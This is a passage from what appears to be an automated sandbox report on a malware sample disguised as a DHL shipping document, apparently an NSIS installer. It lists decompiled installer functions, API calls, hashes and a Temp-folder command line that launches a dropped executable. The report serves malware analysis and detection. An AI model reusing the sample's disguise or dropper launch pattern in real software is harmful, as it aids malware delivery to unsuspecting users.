                                                              • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,"C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,00000000,00000000,"C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                              • String ID: "C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                                                              • API String ID: 1941528284-509353289
                                                              • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                              • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                              • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                              • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                                                              C-Code - Quality: 100%
                                                              			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                              0x004069dc
                                                              0x004069e5
                                                              0x004069e7
                                                              0x004069e7
                                                              0x004069eb
                                                              0x004069fe
                                                              0x004069f8
                                                              0x004069f8
                                                              0x004069f8
                                                              0x00406a17
                                                              0x00406a2b
                                                              0x00406a32

                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                              • wsprintfW.USER32 ref: 00406A17
                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                              • String ID: %s%S.dll$UXTHEME$\
                                                              • API String ID: 2200240437-1946221925
                                                              • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                              • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                              • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                              • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                                                              C-Code - Quality: 100%
                                                              			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                              0x00405ba4
                                                              0x00405ba8
                                                              0x00405bab
                                                              0x00405bb1
                                                              0x00405bb5
                                                              0x00405bb9
                                                              0x00405bc1
                                                              0x00405bc8
                                                              0x00405bce
                                                              0x00405bd5
                                                              0x00405bdc
                                                              0x00405be4
                                                              0x00405be6
                                                              0x00000000
                                                              0x00405be6
                                                              0x00405bf0
                                                              0x00405bf7
                                                              0x00405c0d
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405c0f
                                                              0x00405c13

                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                              • GetLastError.KERNEL32 ref: 00405BF0
                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                              • GetLastError.KERNEL32 ref: 00405C0F
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 3449924974-3081826266
                                                              • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                              • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                              • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                              • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 538 406187-406193 539 406194-4061c8 GetTickCount GetTempFileNameW 538->539 540 4061d7-4061d9 539->540 541 4061ca-4061cc 539->541 543 4061d1-4061d4 540->543 541->539 542 4061ce 541->542 542->543
                                                              C-Code - Quality: 100%
                                                              			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                              0x0040618d
                                                              0x00406193
                                                              0x00406194
                                                              0x00406194
                                                              0x00406199
                                                              0x0040619a
                                                              0x0040619d
                                                              0x004061a2
                                                              0x004061a5
                                                              0x004061af
                                                              0x004061bc
                                                              0x004061c0
                                                              0x004061c8
                                                              0x00000000
                                                              0x00000000
                                                              0x004061cc
                                                              0x00000000
                                                              0x004061ce
                                                              0x004061ce
                                                              0x004061ce
                                                              0x004061d1
                                                              0x004061d4
                                                              0x004061d4
                                                              0x004061d7
                                                              0x00000000

                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 004061A5
                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: CountFileNameTempTick
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                              • API String ID: 1716503409-678247507
                                                              • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                              • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                              • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                              • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 544 403c25-403c34 545 403c40-403c48 544->545 546 403c36-403c39 CloseHandle 544->546 547 403c54-403c60 call 403c82 call 405d74 545->547 548 403c4a-403c4d CloseHandle 545->548 546->545 552 403c65-403c66 547->552 548->547
                                                              C-Code - Quality: 100%
                                                              			E00403C25() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				_t4 = E00405D74(_t11, L"C:\\Users\\jones\\AppData\\Local\\Temp\\nse5B62.tmp\\", 7); // executed
				return _t4;
			}







                                                              0x00403c25
                                                              0x00403c34
                                                              0x00403c37
                                                              0x00403c39
                                                              0x00403c39
                                                              0x00403c40
                                                              0x00403c48
                                                              0x00403c4b
                                                              0x00403c4d
                                                              0x00403c4d
                                                              0x00403c4d
                                                              0x00403c54
                                                              0x00403c60
                                                              0x00403c66

                                                              APIs
                                                              • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                              • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\nse5B62.tmp\, xrefs: 00403C5B
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nse5B62.tmp\
                                                              • API String ID: 2962429428-1941138922
                                                              • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                              • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                              • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                              • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 636 4015c1-4015d5 call 402da6 call 405fe2 641 401631-401634 636->641 642 4015d7-4015ea call 405f64 636->642 643 401663-4022f6 call 401423 641->643 644 401636-401655 call 401423 call 406668 SetCurrentDirectoryW 641->644 649 401604-401607 call 405c16 642->649 650 4015ec-4015ef 642->650 660 402c2a-402c39 643->660 661 40292e-402935 643->661 644->660 663 40165b-40165e 644->663 659 40160c-40160e 649->659 650->649 653 4015f1-4015f8 call 405c33 650->653 653->649 667 4015fa-4015fd call 405b99 653->667 665 401610-401615 659->665 666 401627-40162f 659->666 661->660 663->660 669 401624 665->669 670 401617-401622 GetFileAttributesW 665->670 666->641 666->642 672 401602 667->672 669->666 670->666 670->669 672->659
                                                              C-Code - Quality: 86%
                                                              			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(L"C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                              0x004015c1
                                                              0x004015c9
                                                              0x004015cc
                                                              0x004015d1
                                                              0x004015d5
                                                              0x004015d7
                                                              0x004015df
                                                              0x004015e1
                                                              0x004015e4
                                                              0x004015ea
                                                              0x00401604
                                                              0x00401607
                                                              0x004015ec
                                                              0x004015ec
                                                              0x004015ef
                                                              0x00000000
                                                              0x004015fa
                                                              0x004015fd
                                                              0x004015fd
                                                              0x004015ef
                                                              0x0040160e
                                                              0x00401615
                                                              0x00401624
                                                              0x00401624
                                                              0x00401617
                                                              0x0040161a
                                                              0x00401622
                                                              0x00000000
                                                              0x00000000
                                                              0x00401622
                                                              0x00401615
                                                              0x00401627
                                                              0x0040162b
                                                              0x0040162c
                                                              0x004015d7
                                                              0x00401634
                                                              0x00401663
                                                              0x004022f1
                                                              0x00401636
                                                              0x00401638
                                                              0x00401645
                                                              0x0040164d
                                                              0x00401655
                                                              0x0040165b
                                                              0x0040165b
                                                              0x00401655
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                                • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560,00000000), ref: 00405FF0
                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                              • API String ID: 1892508949-47812868
                                                              • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                              • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                              • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                              • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 673 40603f-40605a call 406668 call 405fe2 678 406060-40606d call 4068ef 673->678 679 40605c-40605e 673->679 683 40607d-406081 678->683 684 40606f-406075 678->684 680 4060b8-4060ba 679->680 686 406097-4060a0 lstrlenW 683->686 684->679 685 406077-40607b 684->685 685->679 685->683 687 4060a2-4060b6 call 405f37 GetFileAttributesW 686->687 688 406083-40608a call 40699e 686->688 687->680 693 406091-406092 call 405f83 688->693 694 40608c-40608f 688->694 693->686 694->679 694->693
                                                              C-Code - Quality: 53%
                                                              			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
